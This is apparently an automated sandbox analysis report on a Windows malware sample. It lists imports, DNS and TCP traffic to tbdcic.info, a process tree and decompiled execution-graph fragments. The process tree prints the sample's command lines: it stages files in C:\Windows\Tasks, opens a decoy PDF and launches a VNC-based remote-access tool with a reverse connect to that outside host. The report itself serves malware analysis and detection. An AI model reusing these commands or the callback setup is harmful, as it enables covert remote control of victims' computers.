                                                  RT_ICON0x243300x1a68Device independent bitmap graphic, 40 x 80 x 32, image size 6720RussianRussia0.16553254437869822
                                                  RT_ICON0x25d980x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224RussianRussia0.21106941838649157
                                                  RT_ICON0x26e400x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400RussianRussia0.29508196721311475
                                                  RT_ICON0x277c80x6b8Device independent bitmap graphic, 20 x 40 x 32, image size 1680RussianRussia0.33313953488372094
                                                  RT_ICON0x27e800x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088RussianRussia0.4592198581560284
                                                  RT_GROUP_ICON0x282e80x76dataRussianRussia0.7457627118644068
                                                  RT_VERSION0x283600x350data0.4693396226415094
                                                  RT_MANIFEST0x286b00x33cASCII text, with CRLF line terminatorsEnglishUnited States0.501207729468599
                                                  DLLImport
                                                  COMCTL32.dll
                                                  SHELL32.dllSHGetSpecialFolderPathW, ShellExecuteW, SHGetMalloc, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteExW
                                                  GDI32.dllCreateCompatibleDC, CreateFontIndirectW, DeleteObject, DeleteDC, GetCurrentObject, StretchBlt, GetDeviceCaps, CreateCompatibleBitmap, SelectObject, SetStretchBltMode, GetObjectW
                                                  ADVAPI32.dllFreeSid, AllocateAndInitializeSid, CheckTokenMembership
                                                  USER32.dllGetMenu, SetWindowPos, GetWindowDC, ReleaseDC, CopyImage, GetKeyState, GetWindowRect, ScreenToClient, GetWindowLongW, SetTimer, GetMessageW, DispatchMessageW, KillTimer, DestroyWindow, EndDialog, SendMessageW, wsprintfW, GetClassNameA, GetWindowTextW, GetWindowTextLengthW, GetSysColor, wsprintfA, SetWindowTextW, CreateWindowExW, GetDlgItem, GetClientRect, SetWindowLongW, UnhookWindowsHookEx, SetFocus, GetSystemMetrics, SystemParametersInfoW, ShowWindow, DrawTextW, GetDC, ClientToScreen, GetWindow, DialogBoxIndirectParamW, DrawIconEx, CallWindowProcW, DefWindowProcW, CallNextHookEx, PtInRect, SetWindowsHookExW, LoadImageW, LoadIconW, MessageBeep, EnableWindow, IsWindow, EnableMenuItem, GetSystemMenu, wvsprintfW, CharUpperW, MessageBoxA, GetParent
                                                  ole32.dllCreateStreamOnHGlobal, CoCreateInstance, CoInitialize
                                                  OLEAUT32.dllSysAllocString, VariantClear, OleLoadPicture
                                                  KERNEL32.dllSetFileTime, SetEndOfFile, EnterCriticalSection, DeleteCriticalSection, GetModuleHandleA, LeaveCriticalSection, WaitForMultipleObjects, ReadFile, SetFilePointer, GetFileSize, FormatMessageW, lstrcpyW, LocalFree, IsBadReadPtr, GetSystemDirectoryW, GetCurrentThreadId, SuspendThread, TerminateThread, InitializeCriticalSection, ResetEvent, SetEvent, CreateEventW, GetVersionExW, GetModuleFileNameW, GetCurrentProcess, SetProcessWorkingSetSize, SetCurrentDirectoryW, GetDriveTypeW, CreateFileW, GetCommandLineW, GetStartupInfoW, CreateProcessW, CreateJobObjectW, ResumeThread, AssignProcessToJobObject, CreateIoCompletionPort, SetInformationJobObject, GetQueuedCompletionStatus, GetExitCodeProcess, CloseHandle, SetEnvironmentVariableW, GetTempPathW, GetSystemTimeAsFileTime, lstrlenW, CompareFileTime, SetThreadLocale, FindFirstFileW, DeleteFileW, FindNextFileW, FindClose, RemoveDirectoryW, ExpandEnvironmentStringsW, WideCharToMultiByte, VirtualAlloc, GlobalMemoryStatusEx, lstrcmpW, GetEnvironmentVariableW, lstrcmpiW, lstrlenA, GetLocaleInfoW, MultiByteToWideChar, GetUserDefaultUILanguage, GetSystemDefaultUILanguage, GetSystemDefaultLCID, lstrcmpiA, GlobalAlloc, GlobalFree, MulDiv, FindResourceExA, SizeofResource, LoadResource, LockResource, LoadLibraryA, ExitProcess, lstrcatW, GetDiskFreeSpaceExW, SetFileAttributesW, SetLastError, Sleep, GetExitCodeThread, WaitForSingleObject, CreateThread, GetLastError, SystemTimeToFileTime, GetLocalTime, GetFileAttributesW, CreateDirectoryW, WriteFile, GetStdHandle, VirtualFree, GetModuleHandleW, GetProcAddress, GetStartupInfoA
                                                  MSVCRT.dll??3@YAXPAX@Z, ??2@YAPAXI@Z, memcmp, free, memcpy, _controlfp, _except_handler3, __set_app_type, __p__fmode, __p__commode, _adjust_fdiv, __setusermatherr, _initterm, __getmainargs, _acmdln, exit, _XcptFilter, _exit, ??1type_info@@UAE@XZ, _onexit, __dllonexit, _CxxThrowException, _beginthreadex, _EH_prolog, ?_set_new_handler@@YAP6AHI@ZP6AHI@Z@Z, memset, _wcsnicmp, strncmp, wcsncmp, malloc, memmove, _wtol, _purecall
                                                  Language of compilation systemCountry where language is spokenMap
                                                  RussianRussia
                                                  EnglishUnited States
                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Dec 23, 2024 13:29:29.248423100 CET49781443192.168.2.6194.190.152.201
                                                  Dec 23, 2024 13:29:29.248473883 CET44349781194.190.152.201192.168.2.6
                                                  Dec 23, 2024 13:29:29.248553038 CET49781443192.168.2.6194.190.152.201
                                                  Dec 23, 2024 13:29:29.248713017 CET49781443192.168.2.6194.190.152.201
                                                  Dec 23, 2024 13:29:29.248725891 CET44349781194.190.152.201192.168.2.6
                                                  Dec 23, 2024 13:29:29.248749971 CET44349781194.190.152.201192.168.2.6
                                                  Dec 23, 2024 13:29:29.376131058 CET49782443192.168.2.6194.190.152.201
                                                  Dec 23, 2024 13:29:29.376209974 CET44349782194.190.152.201192.168.2.6
                                                  Dec 23, 2024 13:29:29.376288891 CET49782443192.168.2.6194.190.152.201
                                                  Dec 23, 2024 13:29:29.376440048 CET49782443192.168.2.6194.190.152.201
                                                  Dec 23, 2024 13:29:29.376487970 CET44349782194.190.152.201192.168.2.6
                                                  Dec 23, 2024 13:29:29.376535892 CET44349782194.190.152.201192.168.2.6
                                                  Dec 23, 2024 13:29:40.513093948 CET49819443192.168.2.6194.190.152.201
                                                  Dec 23, 2024 13:29:40.513128996 CET44349819194.190.152.201192.168.2.6
                                                  Dec 23, 2024 13:29:40.513499975 CET49819443192.168.2.6194.190.152.201
                                                  Dec 23, 2024 13:29:40.513624907 CET49819443192.168.2.6194.190.152.201
                                                  Dec 23, 2024 13:29:40.513636112 CET44349819194.190.152.201192.168.2.6
                                                  Dec 23, 2024 13:29:40.513664961 CET44349819194.190.152.201192.168.2.6
                                                  Dec 23, 2024 13:30:02.893889904 CET49875443192.168.2.6194.190.152.201
                                                  Dec 23, 2024 13:30:02.893925905 CET44349875194.190.152.201192.168.2.6
                                                  Dec 23, 2024 13:30:02.894022942 CET49875443192.168.2.6194.190.152.201
                                                  Dec 23, 2024 13:30:02.894176006 CET49875443192.168.2.6194.190.152.201
                                                  Dec 23, 2024 13:30:02.894186020 CET44349875194.190.152.201192.168.2.6
                                                  Dec 23, 2024 13:30:02.894217968 CET44349875194.190.152.201192.168.2.6
                                                  Dec 23, 2024 13:30:42.298312902 CET49955443192.168.2.6194.190.152.201
                                                  Dec 23, 2024 13:30:42.298343897 CET44349955194.190.152.201192.168.2.6
                                                  Dec 23, 2024 13:30:42.298589945 CET49955443192.168.2.6194.190.152.201
                                                  Dec 23, 2024 13:30:42.298816919 CET49955443192.168.2.6194.190.152.201
                                                  Dec 23, 2024 13:30:42.298826933 CET44349955194.190.152.201192.168.2.6
                                                  Dec 23, 2024 13:30:42.298885107 CET44349955194.190.152.201192.168.2.6
                                                  Dec 23, 2024 13:31:32.958844900 CET50042443192.168.2.6194.190.152.201
                                                  Dec 23, 2024 13:31:32.958884001 CET44350042194.190.152.201192.168.2.6
                                                  Dec 23, 2024 13:31:32.958982944 CET50042443192.168.2.6194.190.152.201
                                                  Dec 23, 2024 13:31:32.959064960 CET50042443192.168.2.6194.190.152.201
                                                  Dec 23, 2024 13:31:32.959070921 CET44350042194.190.152.201192.168.2.6
                                                  Dec 23, 2024 13:31:32.959191084 CET44350042194.190.152.201192.168.2.6
                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Dec 23, 2024 13:29:22.120979071 CET5654953192.168.2.61.1.1.1
                                                  Dec 23, 2024 13:29:28.993563890 CET5399953192.168.2.61.1.1.1
                                                  Dec 23, 2024 13:29:29.131325006 CET53539991.1.1.1192.168.2.6
                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                  Dec 23, 2024 13:29:22.120979071 CET192.168.2.61.1.1.10xf4cbStandard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false
                                                  Dec 23, 2024 13:29:28.993563890 CET192.168.2.61.1.1.10xe7b9Standard query (0)tbdcic.infoA (IP address)IN (0x0001)false
                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                  Dec 23, 2024 13:29:22.259048939 CET1.1.1.1192.168.2.60xf4cbNo error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                  Dec 23, 2024 13:29:29.131325006 CET1.1.1.1192.168.2.60xe7b9No error (0)tbdcic.info194.190.152.201A (IP address)IN (0x0001)false
                                                  Dec 23, 2024 13:29:59.090620041 CET1.1.1.1192.168.2.60x938cNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                  Dec 23, 2024 13:29:59.090620041 CET1.1.1.1192.168.2.60x938cNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                  Dec 23, 2024 13:30:38.652782917 CET1.1.1.1192.168.2.60x715eNo error (0)g-bing-com.ax-0001.ax-msedge.netax-0001.ax-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                  Dec 23, 2024 13:30:38.652782917 CET1.1.1.1192.168.2.60x715eNo error (0)ax-0001.ax-msedge.net150.171.27.10A (IP address)IN (0x0001)false
                                                  Dec 23, 2024 13:30:38.652782917 CET1.1.1.1192.168.2.60x715eNo error (0)ax-0001.ax-msedge.net150.171.28.10A (IP address)IN (0x0001)false

                                                  Click to jump to process

                                                  Click to jump to process

                                                  Click to dive into process behavior distribution

                                                  Click to jump to process

                                                  Target ID:0
                                                  Start time:07:29:08
                                                  Start date:23/12/2024
                                                  Path:C:\Users\user\Desktop\Olz7TmvkEW.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\Olz7TmvkEW.exe"
                                                  Imagebase:0x400000
                                                  File size:1'641'047 bytes
                                                  MD5 hash:539B0FC32045DE3013D00850827654AA
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000000.00000003.2175354129.000000000287B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000000.00000003.2175678289.0000000000ABB000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000000.00000003.2175354129.00000000026B0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  Reputation:low
                                                  Has exited:false

                                                  Target ID:3
                                                  Start time:07:29:09
                                                  Start date:23/12/2024
                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\"
                                                  Imagebase:0x1c0000
                                                  File size:236'544 bytes
                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:4
                                                  Start time:07:29:09
                                                  Start date:23/12/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff66e660000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:5
                                                  Start time:07:29:09
                                                  Start date:23/12/2024
                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & copy 5482310161066753 5482310161066753.cmd
                                                  Imagebase:0x1c0000
                                                  File size:236'544 bytes
                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:6
                                                  Start time:07:29:09
                                                  Start date:23/12/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff66e660000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:7
                                                  Start time:07:29:09
                                                  Start date:23/12/2024
                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & 5482310161066753.cmd
                                                  Imagebase:0x1c0000
                                                  File size:236'544 bytes
                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:false

                                                  Target ID:8
                                                  Start time:07:29:09
                                                  Start date:23/12/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff66e660000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:false

                                                  Target ID:9
                                                  Start time:07:29:09
                                                  Start date:23/12/2024
                                                  Path:C:\Windows\SysWOW64\timeout.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:timeout /t 1
                                                  Imagebase:0x820000
                                                  File size:25'088 bytes
                                                  MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:10
                                                  Start time:07:29:11
                                                  Start date:23/12/2024
                                                  Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\Lom.pdf"
                                                  Imagebase:0x7ff651090000
                                                  File size:5'641'176 bytes
                                                  MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:false

                                                  Target ID:11
                                                  Start time:07:29:11
                                                  Start date:23/12/2024
                                                  Path:C:\Windows\SysWOW64\timeout.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:timeout /t 1
                                                  Imagebase:0x820000
                                                  File size:25'088 bytes
                                                  MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:12
                                                  Start time:07:29:12
                                                  Start date:23/12/2024
                                                  Path:C:\Windows\SysWOW64\taskkill.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:taskkill /f /im sync_browser.exe
                                                  Imagebase:0xd70000
                                                  File size:74'240 bytes
                                                  MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:13
                                                  Start time:07:29:12
                                                  Start date:23/12/2024
                                                  Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                                                  Imagebase:0x7ff70df30000
                                                  File size:3'581'912 bytes
                                                  MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:false

                                                  Target ID:14
                                                  Start time:07:29:12
                                                  Start date:23/12/2024
                                                  Path:C:\Windows\SysWOW64\timeout.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:timeout /t 2
                                                  Imagebase:0x820000
                                                  File size:25'088 bytes
                                                  MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:16
                                                  Start time:07:29:13
                                                  Start date:23/12/2024
                                                  Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2092 --field-trial-handle=1568,i,8224876914064960340,8194205702827527936,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                                  Imagebase:0x7ff70df30000
                                                  File size:3'581'912 bytes
                                                  MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:false

                                                  Target ID:17
                                                  Start time:07:29:15
                                                  Start date:23/12/2024
                                                  Path:C:\Windows\SysWOW64\timeout.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:timeout /t 1
                                                  Imagebase:0x820000
                                                  File size:25'088 bytes
                                                  MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:18
                                                  Start time:07:29:17
                                                  Start date:23/12/2024
                                                  Path:C:\Windows\SysWOW64\timeout.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:timeout /t 2
                                                  Imagebase:0x820000
                                                  File size:25'088 bytes
                                                  MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:21
                                                  Start time:07:29:20
                                                  Start date:23/12/2024
                                                  Path:C:\Windows\Tasks\sync_browser.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\Tasks\sync_browser.exe
                                                  Imagebase:0x7ff7d5930000
                                                  File size:1'945'368 bytes
                                                  MD5 hash:749B3A68B9C5325D592822EE7C2C17EC
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000015.00000000.2289193498.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000015.00000000.2289093130.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: C:\Windows\Tasks\sync_browser.exe, Author: Joe Security
                                                  Antivirus matches:
                                                  • Detection: 0%, ReversingLabs
                                                  Has exited:false

                                                  Target ID:22
                                                  Start time:07:29:20
                                                  Start date:23/12/2024
                                                  Path:C:\Windows\SysWOW64\timeout.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:timeout /t 8
                                                  Imagebase:0x820000
                                                  File size:25'088 bytes
                                                  MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:26
                                                  Start time:07:29:28
                                                  Start date:23/12/2024
                                                  Path:C:\Windows\Tasks\sync_browser.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\Tasks\sync_browser.exe -autoreconnect -id:user-PC_Thj0Wf -connect tbdcic.info:443
                                                  Imagebase:0x7ff7d5930000
                                                  File size:1'945'368 bytes
                                                  MD5 hash:749B3A68B9C5325D592822EE7C2C17EC
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 0000001A.00000002.2369777951.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 0000001A.00000000.2366206876.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 0000001A.00000000.2366282795.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 0000001A.00000002.2369623705.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                  Has exited:true

                                                  Target ID:27
                                                  Start time:07:29:28
                                                  Start date:23/12/2024
                                                  Path:C:\Windows\SysWOW64\timeout.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:timeout /t 2
                                                  Imagebase:0x820000
                                                  File size:25'088 bytes
                                                  MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:28
                                                  Start time:07:29:30
                                                  Start date:23/12/2024
                                                  Path:C:\Windows\SysWOW64\timeout.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:timeout /t 4
                                                  Imagebase:0x820000
                                                  File size:25'088 bytes
                                                  MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:30
                                                  Start time:07:29:34
                                                  Start date:23/12/2024
                                                  Path:C:\Windows\SysWOW64\timeout.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:timeout /t 42
                                                  Imagebase:0x820000
                                                  File size:25'088 bytes
                                                  MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:false

                                                  Reset < >

                                                    Execution Graph

                                                    Execution Coverage:18.3%
                                                    Dynamic/Decrypted Code Coverage:0%
                                                    Signature Coverage:26.6%
                                                    Total number of Nodes:1618
                                                    Total number of Limit Nodes:14
                                                    execution_graph 8461 40c460 8462 40c467 8461->8462 8463 40c46f 8461->8463 8465 40c499 8463->8465 8466 40275c 8463->8466 8471 4026cf 8466->8471 8469 40276a 8469->8465 8470 40276b malloc 8472 4026df 8471->8472 8478 4026db 8471->8478 8473 4026ef GlobalMemoryStatusEx 8472->8473 8472->8478 8474 4026fd 8473->8474 8473->8478 8474->8478 8479 402187 8474->8479 8478->8469 8478->8470 8481 40219e 8479->8481 8480 4021cf GetLastError wsprintfW GetEnvironmentVariableW GetLastError 8483 402207 ??2@YAPAXI GetEnvironmentVariableW 8480->8483 8484 40227f SetLastError 8480->8484 8481->8480 8482 4021c5 8481->8482 8499 408d52 8482->8499 8486 402268 ??3@YAXPAX 8483->8486 8487 402236 GetLastError 8483->8487 8484->8482 8485 402296 8484->8485 8489 4022b5 lstrlenA ??2@YAPAXI 8485->8489 8508 402131 8485->8508 8491 40226b 8486->8491 8487->8486 8490 40223c 8487->8490 8493 402320 MultiByteToWideChar 8489->8493 8494 4022e6 GetLocaleInfoW 8489->8494 8490->8491 8495 402246 lstrcmpiW 8490->8495 8491->8484 8493->8482 8494->8493 8497 40230d _wtol 8494->8497 8495->8486 8498 402255 ??3@YAXPAX 8495->8498 8496 4022ab 8496->8489 8497->8493 8498->8491 8515 407c87 8499->8515 8502 408d89 8520 407ce8 8502->8520 8503 408d77 IsBadReadPtr 8503->8502 8507 408dba 8507->8478 8509 40213b GetUserDefaultUILanguage 8508->8509 8510 40217f 8508->8510 8511 402158 8509->8511 8512 40215c GetSystemDefaultUILanguage 8509->8512 8510->8496 8511->8496 8512->8510 8513 402168 GetSystemDefaultLCID 8512->8513 8513->8510 8514 402178 8513->8514 8514->8510 8533 401458 8515->8533 8518 407ce4 IsWindow 8518->8502 8518->8503 8519 407cc0 GetSystemMetrics GetSystemMetrics 8519->8518 8521 407cf7 8520->8521 8522 407d5b 8520->8522 8521->8522 8541 402771 8521->8541 8532 407a5b ??3@YAXPAX 8522->8532 8524 407d08 8525 402771 2 API calls 8524->8525 8526 407d13 8525->8526 8545 4041f8 8526->8545 8529 4041f8 20 API calls 8530 407d25 ??3@YAXPAX ??3@YAXPAX 8529->8530 8530->8522 8532->8507 8536 401172 8533->8536 8537 401180 ??2@YAPAXI 8536->8537 8538 4011be 8536->8538 8537->8538 8539 4011a1 ??3@YAXPAX 8537->8539 8538->8518 8538->8519 8539->8538 8542 402788 8541->8542 8543 401172 2 API calls 8542->8543 8544 402793 8543->8544 8544->8524 8552 402b71 8545->8552 8549 404210 8588 4041c4 8549->8588 8553 401458 2 API calls 8552->8553 8554 402b7f 8553->8554 8555 402b8f ExpandEnvironmentStringsW 8554->8555 8556 401172 2 API calls 8554->8556 8557 402bb3 8555->8557 8558 402ba8 ??3@YAXPAX 8555->8558 8556->8555 8599 4027aa 8557->8599 8559 402bea 8558->8559 8565 403ebc 8559->8565 8562 402bce 8603 4013a9 8562->8603 8564 402be2 ??3@YAXPAX 8564->8559 8566 401458 2 API calls 8565->8566 8567 403eca 8566->8567 8568 4013a9 2 API calls 8567->8568 8569 403ed5 8568->8569 8607 4027c2 8569->8607 8571 403ee2 8572 402771 2 API calls 8571->8572 8573 403eef 8572->8573 8611 403e41 8573->8611 8576 4013a9 2 API calls 8577 403f13 8576->8577 8578 4027c2 2 API calls 8577->8578 8579 403f20 8578->8579 8580 402771 2 API calls 8579->8580 8581 403f2d 8580->8581 8582 403e41 3 API calls 8581->8582 8583 403f3d ??3@YAXPAX 8582->8583 8584 402771 2 API calls 8583->8584 8585 403f54 8584->8585 8586 403e41 3 API calls 8585->8586 8587 403f63 ??3@YAXPAX ??3@YAXPAX 8586->8587 8587->8549 8589 402b71 6 API calls 8588->8589 8590 4041cf 8589->8590 8636 403f77 8590->8636 8592 4041dc 8659 404032 8592->8659 8594 4041e7 8682 4040ed 8594->8682 8596 4041ed 8597 402b71 6 API calls 8596->8597 8598 4041f3 8597->8598 8598->8529 8600 4027b6 8599->8600 8601 4027bc ExpandEnvironmentStringsW 8599->8601 8602 401172 2 API calls 8600->8602 8601->8562 8602->8601 8604 4013b5 8603->8604 8606 4013c7 8603->8606 8605 401172 2 API calls 8604->8605 8605->8606 8606->8564 8608 4027cf 8607->8608 8616 4013df 8608->8616 8610 4027da 8610->8571 8612 403e53 ??3@YAXPAX 8611->8612 8615 403e57 8611->8615 8612->8576 8615->8612 8620 4029d8 8615->8620 8624 403303 8615->8624 8617 401423 8616->8617 8618 4013f3 8616->8618 8617->8610 8619 401172 2 API calls 8618->8619 8619->8617 8621 4029ee 8620->8621 8623 402a02 8621->8623 8628 4025a5 memmove 8621->8628 8623->8615 8625 403312 8624->8625 8627 40332b 8625->8627 8629 402a90 8625->8629 8627->8615 8628->8623 8630 402aa0 8629->8630 8631 4013df 2 API calls 8630->8631 8632 402aac 8631->8632 8635 4025a5 memmove 8632->8635 8634 402ab9 8634->8627 8635->8634 8637 401458 2 API calls 8636->8637 8638 403f85 8637->8638 8639 4013a9 2 API calls 8638->8639 8640 403f90 8639->8640 8641 4027c2 2 